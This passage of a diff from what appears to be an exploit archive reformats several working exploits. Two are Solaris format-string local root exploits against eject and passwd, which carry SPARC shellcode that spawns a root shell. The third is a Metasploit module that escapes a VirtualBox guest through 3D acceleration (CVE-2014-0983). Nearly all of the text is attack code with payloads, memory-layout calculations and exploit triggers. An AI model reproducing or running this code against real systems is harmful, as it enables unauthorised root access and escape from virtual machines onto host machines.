execl().\\n\"); + fprintf(stderr,"Can't find execl().\n"); exit(1); } - /* dec 4 to skip the \'save\' instructure */ + /* dec 4 to skip the 'save' instructure */ execl_addr -= 4; /* check if the exec addr includes zero */ if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) || !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000)) { - fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\"); + fprintf(stderr,"the address of execl() contains a '0'. sorry.\n"); exit(1); } - printf(\"Using execl() address : %#x\\n\",execl_addr); + printf("Using execl() address : %#x\n",execl_addr); /* now we set up our fake stack frame */ @@ -239,15 +239,15 @@ main( int argc, char **argv ) *addrptr++=fp1_addr; *addrptr++=fp1_addr; *addrptr++=fp1_addr; /* we need this address to work */ - *addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */ + *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */ *addrptr++=0x0; /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */ retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff); - printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align ); + printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align ); - /* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ + /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ addrptr = (long *)retlocbuf; for( i = 0 ; i < 8 ; i ++ ) @@ -258,19 +258,19 @@ main( int argc, char **argv ) *(addrptr + 7) = retloc + 2; if((pattern = (char *)malloc(BUFSIZE)) == NULL) { - printf(\"Can\'t get enough memory!\\n\"); + printf("Can't get enough memory!\n"); exit(-1); } - /* Let\'s make formats string buffer: + /* Let's make formats string buffer: * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn| */ ptr = pattern; - memset(ptr, \'A\', 32); + memset(ptr, 'A', 32); ptr += 32; for(i = 0 ; i < num ; i++ ){ - memcpy(ptr, \"%.8x\", 4); + memcpy(ptr, "%.8x", 4); ptr += 4; } @@ -281,30 +281,30 @@ main( int argc, char **argv ) /* Big endian arch */ - sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\", + sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn", (reth - num*8 -4*8 + align ), (0x10000 + retl - reth), (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1)); - if( !(fp = fopen(\"messages.po\", \"w+\"))) + if( !(fp = fopen("messages.po", "w+"))) { - perror(\"fopen\"); + perror("fopen"); exit(1); } - fprintf(fp,\"domain \\\"messages\\\"\\n\"); - fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\"); - fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align); + fprintf(fp,"domain \"messages\"\n"); + fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n"); + fprintf(fp,"msgstr \"%s\\n\"", pattern + align); fclose(fp); - system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\"); + system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po"); - /* thanks for z33d\'s idea. + /* thanks for z33d's idea. * It seems we have to do like this in Solaris 8. */ - i=open(\"./SUNW_OST_OSLIB\",O_RDWR); + i=open("./SUNW_OST_OSLIB",O_RDWR); /* locate the start position of formats strings in binary file*/ lseek(i, 62, SEEK_SET); /* replace the start bytes with our retlocbuf */ write(i, retlocbuf + align, 32 - align); close(i); - execle(VULPROG, VULPROG, \"-z\", NULL, env); + execle(VULPROG, VULPROG, "-z", NULL, env); } /* end of main */ \ No newline at end of file diff --git a/platforms/solaris/local/20188.c b/platforms/solaris/local/20188.c index b57fd50ca..3858c4088 100755 --- a/platforms/solaris/local/20188.c +++ b/platforms/solaris/local/20188.c @@ -19,7 +19,7 @@ It should be noted under Linux this problem must be exploited in conjunction wit */ -/* \"eject\" exploit for locale subsystem format strings bug In Solaris +/* "eject" exploit for locale subsystem format strings bug In Solaris * Tested in Solaris 2.6/7.0 * Script kiddies: you should modify this code * slightly by yourself. :) @@ -37,30 +37,30 @@ It should be noted under Linux this problem must be exploited in conjunction wit #define RETLOC 0xffbefa2c /* default retloc */ #define NUM 95 /* maybe should adjust this number */ -#define ALIGN 0 /* If don\'t work ,try adjust align to 0,1,2,3 */ +#define ALIGN 0 /* If don't work ,try adjust align to 0,1,2,3 */ #define BUFSIZE 2048 /* the size of format string buffer*/ #define EGGSIZE 1024 /* the egg buffer size */ -#define NOP 0xfa1d4015 /* \"xor %l5, %l5, %l5\" */ +#define NOP 0xfa1d4015 /* "xor %l5, %l5, %l5" */ #define ALIGN1 2 -#define VULPROG \"/usr/bin/eject\" +#define VULPROG "/usr/bin/eject" -char shellcode[] = /* from scz\'s funny shellcode for SPARC */ -\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */ -\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */ -\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\" -\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\" -\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\" -\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\" -\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\" -\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"; +char shellcode[] = /* from scz's funny shellcode for SPARC */ +"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */ +"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */ +"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08" +"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" +"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e" +"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07" +"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" +"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff"; /* get current stack point address to guess Return address */ long get_sp(void) { - __asm__(\"mov %sp,%i0\"); + __asm__("mov %sp,%i0"); } @@ -76,14 +76,14 @@ main( int argc, char **argv ) long reth, retl; FILE *fp; - if( argc > 1 ) sscanf(argv[1],\"%x\",&retloc); + if( argc > 1 ) sscanf(argv[1],"%x",&retloc); if( argc > 2 ) align = atoi(argv[2]); if( argc > 3 ) num = atoi(argv[3]); addrptr = (long *) retlocbuf; retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff); - /* Let\'s make reloc buffer */ + /* Let's make reloc buffer */ for( i = 0 ; i < 2 ; i ++ ){ *addrptr++ = 0x41414141; @@ -94,7 +94,7 @@ main( int argc, char **argv ) /* construct shellcode buffer */ - memset(eggbuf,\'A\',EGGSIZE); /* fill the eggbuf with garbage */ + memset(eggbuf,'A',EGGSIZE); /* fill the eggbuf with garbage */ for (i = align; i < EGGSIZE; i+=4) /* fill with NOP */ { eggbuf[i+3]=NOP & 0xff; @@ -106,8 +106,8 @@ main( int argc, char **argv ) If not, exploit will fail. Anyway, our shellcode is. ;-) */ memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4 + align, shellcode, strlen(shellcode)); - //memcpy(eggbuf,\"EGG=\",4);/* Now : EGG=NOP...NOPSHELLCODE */ - env[0] = \"NLSPATH=:.\"; + //memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */ + env[0] = "NLSPATH=:."; env[1] = eggbuf; /* put eggbuf in env */ env[2] = NULL; /* end of env */ @@ -117,43 +117,43 @@ main( int argc, char **argv ) /* get stack bottom address */ sp_addr = (get_sp() | 0xffff) & 0xfffffffc; /* get shellcode address . many thanks to Olaf Kirch. :) - * the trailing \'8\' make sure our sh_addr into \"NOP\"s area. + * the trailing '8' make sure our sh_addr into "NOP"s area. */ sh_addr = sp_addr - strlen(VULPROG) - strlen(plat) - strlen(eggbuf) - 3 + 8 ; - printf(\"Usages: %s \\n\\n\", argv[0] ); - printf(\"Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\\n\", retloc, sh_addr, align ); + printf("Usages: %s \n\n", argv[0] ); + printf("Using RETloc address = 0x%x, RET address = 0x%x ,Align= %d\n", retloc, sh_addr, align ); if((pattern = (char *)malloc(BUFSIZE)) == NULL) { - printf(\"Can\'t get enough memory!\\n\"); + printf("Can't get enough memory!\n"); exit(-1); } ptr = pattern; for(i = 0 ; i < num ; i++ ){ - memcpy(ptr, \"%.8x\", 4); + memcpy(ptr, "%.8x", 4); ptr += 4; } reth = (sh_addr >> 16) & 0xffff ; retl = (sh_addr >> 0) & 0xffff ; - sprintf(ptr, \"%%%uc%%hn%%%uc%%hn\",(reth - num*8), + sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(reth - num*8), (0x10000 + retl - reth)); - printf(\"%s\",pattern); + printf("%s",pattern); - if( !(fp = fopen(\"messages.po\", \"w+\"))) + if( !(fp = fopen("messages.po", "w+"))) { - perror(\"fopen\"); + perror("fopen"); exit(1); } - fprintf(fp,\"domain \\\"messages\\\"\\n\"); - fprintf(fp,\"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\"); - fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern); + fprintf(fp,"domain \"messages\"\n"); + fprintf(fp,"msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n"); + fprintf(fp,"msgstr \"%s\\n\"", pattern); fclose(fp); - system(\"/usr/bin/msgfmt messages.po\"); - system(\"cp messages.mo SUNW_OST_OSCMD\"); - system(\"cp messages.mo SUNW_OST_OSLIB\"); + system("/usr/bin/msgfmt messages.po"); + system("cp messages.mo SUNW_OST_OSCMD"); + system("cp messages.mo SUNW_OST_OSLIB"); - execle(VULPROG,VULPROG,\"-x\",retlocbuf + align1, NULL, env); + execle(VULPROG,VULPROG,"-x",retlocbuf + align1, NULL, env); } /* end of main */ diff --git a/platforms/solaris/local/210.c b/platforms/solaris/local/210.c index 24de0470b..ba2f92d73 100755 --- a/platforms/solaris/local/210.c +++ b/platforms/solaris/local/210.c @@ -3,11 +3,11 @@ * Tested in Solaris 2.6/7.0 (If it wont work, try adjust retloc offset. e.g. * ./ex -o -4 ) * - * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e \'s/^.lib\\([_0-9a-zA-Z]*\\)\\.so.*/-l\\1/\'` + * $gcc -o ex ex.c `ldd /usr/bin/passwd|sed -e 's/^.lib\([_0-9a-zA-Z]*\)\.so.*/-l\1/'` * usages: ./ex -h * * Thanks for Ivan Arce who found this bug. - * Thanks for horizon\'s great article about defeating noexec stack for Solaris. + * Thanks for horizon's great article about defeating noexec stack for Solaris. * * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND SHOULD NOT BE RUN IN * ANY HOST WITHOUT PERMISSION FROM THE SYSTEM ADMINISTRATOR. @@ -24,26 +24,26 @@ #define BUFSIZE 2048 /* the size of format string buffer */ #define BUFF 128 /* the progname buffer size */ -#define SHELL \"/bin/ksh\" /* shell name */ +#define SHELL "/bin/ksh" /* shell name */ #define DEFAULT_NUM 68 /* format strings number */ #define DEFAULT_RETLOC 0xffbefb44 /* default retloc address */ -#define VULPROG \"/usr/bin/passwd\" /* vulnerable program name */ +#define VULPROG "/usr/bin/passwd" /* vulnerable program name */ void usages(char *progname) { int i; - printf(\"Usage: %s \\n\", progname); - printf(\" [-h] Help menu\\n\"); - printf(\" [-n number] format string\'s number\\n\"); - printf(\" [-a align] retloc buffer alignment\\n\"); - printf(\" [-o offset] retloc offset\\n\\n\"); + printf("Usage: %s \n", progname); + printf(" [-h] Help menu\n"); + printf(" [-n number] format string's number\n"); + printf(" [-a align] retloc buffer alignment\n"); + printf(" [-o offset] retloc offset\n\n"); } /* get current stack point address to guess Return address */ long get_sp(void) { - __asm__(\"mov %sp,%i0\"); + __asm__("mov %sp,%i0"); } main( int argc, char **argv ) @@ -70,22 +70,22 @@ main( int argc, char **argv ) char progname[BUFF]; strncpy(progname, argv[0], BUFF-1); - while ((opt = getopt(argc, argv, \"n:a:o:h\")) != -1) + while ((opt = getopt(argc, argv, "n:a:o:h")) != -1) switch((char)opt) { - case \'n\': + case 'n': num = atoi(optarg); break; - case \'a\': + case 'a': align = atoi(optarg); break; - case \'o\': + case 'o': offset = atoi(optarg); break; - case \'?\': - case \'h\': + case '?': + case 'h': default: usages(progname); exit(0); @@ -98,8 +98,8 @@ main( int argc, char **argv ) /* Construct fake frame in environ */ - env[0] = \"NLSPATH=:.\"; - env[1] = padding; /* padding so that fakeframe\'s address can be divided by 4 */ + env[0] = "NLSPATH=:."; + env[1] = padding; /* padding so that fakeframe's address can be divided by 4 */ /* sh_addr|sh_addr|0x00000000|fp2|fp2|fp2|fp2|fp2|0x00|/bin/ksh|0x00 */ env[2]=(fakeframe); /* sh_addr|sh_addr|0x00 */ env[3]=&(fakeframe[40]);/* |0x00 */ @@ -109,17 +109,17 @@ main( int argc, char **argv ) env[7]=SHELL; /* shell strings */ env[8]=NULL; - /* calculate the length of \"VULPROG\" + argv[1] */ - arg_len = strlen(VULPROG) + strlen(\"-z\") + 2; + /* calculate the length of "VULPROG" + argv[1] */ + arg_len = strlen(VULPROG) + strlen("-z") + 2; /* calculate the pad nummber . - * We manage to let the length of padding + arg_len + \"NLSPATH=.\" can + * We manage to let the length of padding + arg_len + "NLSPATH=." can * be divided by 4. So fakeframe address is aligned with 4, otherwise - * the exploit won\'t work. + * the exploit won't work. */ pad = 3 - (arg_len + strlen(env[0]) +1)%4; - memset(padding, \'A\', pad); - padding[pad] = \'\\0\'; + memset(padding, 'A', pad); + padding[pad] = '\0'; /* get environ length */ env_len = 0; @@ -134,21 +134,21 @@ main( int argc, char **argv ) * ^ ^ * |__startaddr |__sp_addr * - * \"sp_addr\" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) + * "sp_addr" = 0xffbefffc(Solaris 7/8) or 0xeffffffc(Solaris 2.6) * - * I find \"startaddr\" always can be divided by 4. - * So we can adjust the padding\'s size to let the fakeframe address + * I find "startaddr" always can be divided by 4. + * So we can adjust the padding's size to let the fakeframe address * can be aligned with 4. * - * len = length of \"argv\" + \"env\" + \"platform\" + \"program name\" + * len = length of "argv" + "env" + "platform" + "program name" * if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4 * if (len%4)==0, sp_addr - startaddr = len - * So we can get every entry\'s address precisely based on startaddr or sp_addr. - * Now we won\'t be bored with guessing the alignment and offset.:) + * So we can get every entry's address precisely based on startaddr or sp_addr. + * Now we won't be bored with guessing the alignment and offset.:) */ len = arg_len + env_len + strlen(plat) + 1 + strlen(VULPROG) + 1; - printf(\"len = %#x\\n\", len); + printf("len = %#x\n", len); /* get stack bottom address */ @@ -161,7 +161,7 @@ main( int argc, char **argv ) sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */ - strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ; - printf(\"SHELL address = %#x\\n\", sh_addr); + printf("SHELL address = %#x\n", sh_addr); /* get our fake frame address */ fp_addr = sh_addr - 8*8 - 1; @@ -169,27 +169,27 @@ main( int argc, char **argv ) /* get execl() address */ if (!(handle=dlopen(NULL,RTLD_LAZY))) { - fprintf(stderr,\"Can\'t dlopen myself.\\n\"); + fprintf(stderr,"Can't dlopen myself.\n"); exit(1); } - if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL) + if ((execl_addr=(long)dlsym(handle,"execl"))==NULL) { - fprintf(stderr,\"Can\'t find execl().\\n\"); + fprintf(stderr,"Can't find execl().\n"); exit(1); } - /* dec 4 to skip the \'save\' instructure */ + /* dec 4 to skip the 'save' instructure */ execl_addr -= 4; /* check if the exec addr includes zero */ if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) || !(execl_addr & 0xff0000) || !(execl_addr & 0xff000000)) { - fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\"); + fprintf(stderr,"the address of execl() contains a '0'. sorry.\n"); exit(1); } - printf(\"Using execl() address : %#x\\n\",execl_addr); + printf("Using execl() address : %#x\n",execl_addr); /* now we set up our fake stack frame */ @@ -211,15 +211,15 @@ main( int argc, char **argv ) *addrptr++=fp1_addr; *addrptr++=fp1_addr; *addrptr++=fp1_addr; /* we need this address to work */ - *addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */ + *addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */ *addrptr++=0x0; /* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */ retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff); - printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align ); + printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align ); - /* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ + /* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/ addrptr = (long *)retlocbuf; @@ -231,19 +231,19 @@ main( int argc, char **argv ) *(addrptr + 7) = retloc + 2; if((pattern = (char *)malloc(BUFSIZE)) == NULL) { - printf(\"Can\'t get enough memory!\\n\"); + printf("Can't get enough memory!\n"); exit(-1); } - /* Let\'s make formats string buffer: + /* Let's make formats string buffer: * |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn| */ ptr = pattern; - memset(ptr, \'A\', 32); + memset(ptr, 'A', 32); ptr += 32; for(i = 0 ; i < num ; i++ ){ - memcpy(ptr, \"%.8x\", 4); + memcpy(ptr, "%.8x", 4); ptr += 4; } @@ -254,32 +254,32 @@ main( int argc, char **argv ) /* Big endian arch */ - sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\", + sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn", (reth - num*8 -4*8 + align ), (0x10000 + retl - reth), (0x20000 + reth1 - retl), (0x30000 + retl1 - reth1)); - if( !(fp = fopen(\"messages.po\", \"w+\"))) + if( !(fp = fopen("messages.po", "w+"))) { - perror(\"fopen\"); + perror("fopen"); exit(1); } - fprintf(fp,\"domain \\\"messages\\\"\\n\"); - fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\"); - fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align); + fprintf(fp,"domain \"messages\"\n"); + fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n"); + fprintf(fp,"msgstr \"%s\\n\"", pattern + align); fclose(fp); - system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\"); + system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po"); - /* thanks for z33d\'s idea. + /* thanks for z33d's idea. * It seems we have to do like this in Solaris 8. */ - i=open(\"./SUNW_OST_OSLIB\",O_RDWR); + i=open("./SUNW_OST_OSLIB",O_RDWR); /* locate the start position of formats strings in binary file*/ lseek(i, 62, SEEK_SET); /* replace the start bytes with our retlocbuf */ write(i, retlocbuf + align, 32 - align); close(i); - execle(VULPROG, VULPROG, \"-z\", NULL, env); + execle(VULPROG, VULPROG, "-z", NULL, env); } diff --git a/platforms/win_x86-64/remote/34334.rb b/platforms/win_x86-64/remote/34334.rb index f78c99163..023a6b2af 100755 --- a/platforms/win_x86-64/remote/34334.rb +++ b/platforms/win_x86-64/remote/34334.rb @@ -3,13 +3,13 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require \'msf/core\' -require \'rex\' +require 'msf/core' +require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking - DEVICE = \'\\\\\\\\.\\\\VBoxGuest\' + DEVICE = '\\\\.\\VBoxGuest' INVALID_HANDLE_VALUE = 0xFFFFFFFF # VBOX HGCM protocol constants @@ -36,59 +36,59 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - \'Name\' => \'VirtualBox 3D Acceleration Virtual Machine Escape\', - \'Description\' => %q{ + 'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape', + 'Description' => %q{ This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted of rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, - \'License\' => MSF_LICENSE, - \'Author\' => + 'License' => MSF_LICENSE, + 'Author' => [ - \'Francisco Falcon\', # Vulnerability Discovery and PoC - \'Florian Ledoux\', # Win 8 64 bits exploitation analysis - \'juan vazquez\' # MSF module + 'Francisco Falcon', # Vulnerability Discovery and PoC + 'Florian Ledoux', # Win 8 64 bits exploitation analysis + 'juan vazquez' # MSF module ], - \'Arch\' => ARCH_X86_64, - \'Platform\' => \'win\', - \'SessionTypes\' => [\'meterpreter\'], - \'DefaultOptions\' => + 'Arch' => ARCH_X86_64, + 'Platform' => 'win', + 'SessionTypes' => ['meterpreter'], + 'DefaultOptions' => { - \'EXITFUNC\' => \'thread\' + 'EXITFUNC' => 'thread' }, - \'Targets\' => + 'Targets' => [ - [ \'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)\', + [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)', { :messages => :target_virtualbox_436_win7_64 } ] ], - \'Payload\' => + 'Payload' => { - \'Space\' => 7000, - \'DisableNops\' => true + 'Space' => 7000, + 'DisableNops' => true }, - \'References\' => + 'References' => [ - [\'CVE\', \'2014-0983\'], - [\'BID\', \'66133\'], - [\'URL\', \'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities\'], - [\'URL\', \'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration\'], - [\'URL\', \'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php\'] + ['CVE', '2014-0983'], + ['BID', '66133'], + ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'], + ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'], + ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php'] ], - \'DisclosureDate\' => \'Mar 11 2014\', - \'DefaultTarget\' => 0 + 'DisclosureDate' => 'Mar 11 2014', + 'DefaultTarget' => 0 })) end def open_device - r = session.railgun.kernel32.CreateFileA(DEVICE, \"GENERIC_READ | GENERIC_WRITE\", 0, nil, \"OPEN_EXISTING\", \"FILE_ATTRIBUTE_NORMAL\", 0) + r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0) - handle = r[\'return\'] + handle = r['return'] if handle == INVALID_HANDLE_VALUE return nil @@ -98,25 +98,25 @@ class Metasploit3 < Msf::Exploit::Local end def send_ioctl(ioctl, msg) - result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, \"\") + result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "") - if result[\"GetLastError\"] != 0 - unless result[\"ErrorMessage\"].blank? - vprint_error(\"#{result[\"ErrorMessage\"]}\") + if result["GetLastError"] != 0 + unless result["ErrorMessage"].blank? + vprint_error("#{result["ErrorMessage"]}") end return nil end - unless result[\"lpBytesReturned\"] && result[\"lpBytesReturned\"] == msg.length - unless result[\"ErrorMessage\"].blank? - vprint_error(\"#{result[\"ErrorMessage\"]}\") + unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length + unless result["ErrorMessage"].blank? + vprint_error("#{result["ErrorMessage"]}") end return nil end - unless result[\"lpOutBuffer\"] && result[\"lpOutBuffer\"].unpack(\"V\").first == 0 - unless result[\"ErrorMessage\"].blank? - vprint_error(\"#{result[\"ErrorMessage\"]}\") + unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0 + unless result["ErrorMessage"].blank? + vprint_error("#{result["ErrorMessage"]}") end return nil end @@ -125,10 +125,10 @@ class Metasploit3 < Msf::Exploit::Local end def connect - msg = \"\\x00\" * CONNECT_MSG_SIZE + msg = "\x00" * CONNECT_MSG_SIZE - msg[4, 4] = [2].pack(\"V\") - msg[8, \"VBoxSharedCrOpenGL\".length] = \"VBoxSharedCrOpenGL\" + msg[4, 4] = [2].pack("V") + msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL" result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg) @@ -136,15 +136,15 @@ class Metasploit3 < Msf::Exploit::Local return result end - client_id = result[\"lpOutBuffer\"][136, 4].unpack(\"V\").first + client_id = result["lpOutBuffer"][136, 4].unpack("V").first client_id end def disconnect - msg = \"\\x00\" * DISCONNECT_MSG_SIZE + msg = "\x00" * DISCONNECT_MSG_SIZE - msg[4, 4] = [@client_id].pack(\"V\") + msg[4, 4] = [@client_id].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg) @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Local end def set_pid(pid) - msg = \"\\x00\" * SET_PID_MSG_SIZE + msg = "\x00" * SET_PID_MSG_SIZE - msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\") - msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID - msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack(\"V\") - msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack(\"V\") - msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack(\"V\") - msg[20, 4] = [pid].pack(\"V\") + msg[0, 4] = [VERR_WRONG_ORDER].pack("V") + msg[4, 4] = [@client_id].pack("V") # u32ClientID + msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V") + msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V") + msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V") + msg[20, 4] = [pid].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) @@ -167,16 +167,16 @@ class Metasploit3 < Msf::Exploit::Local end def set_version - msg = \"\\x00\" * SET_VERSION_MSG_SIZE + msg = "\x00" * SET_VERSION_MSG_SIZE - msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\") - msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID - msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack(\"V\") - msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack(\"V\") - msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\") - msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack(\"V\") - msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\") - msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack(\"V\") + msg[0, 4] = [VERR_WRONG_ORDER].pack("V") + msg[4, 4] = [@client_id].pack("V") # u32ClientID + msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V") + msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V") + msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") + msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V") + msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") + msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) @@ -184,16 +184,16 @@ class Metasploit3 < Msf::Exploit::Local end def trigger(buff_addr, buff_length) - msg = \"\\x00\" * CALL_EA_MSG_SIZE + msg = "\x00" * CALL_EA_MSG_SIZE - msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID - msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack(\"V\") - msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack(\"V\") - msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\") - msg[20, 4] = [@client_id].pack(\"V\") # u32ClientID - msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack(\"V\") - 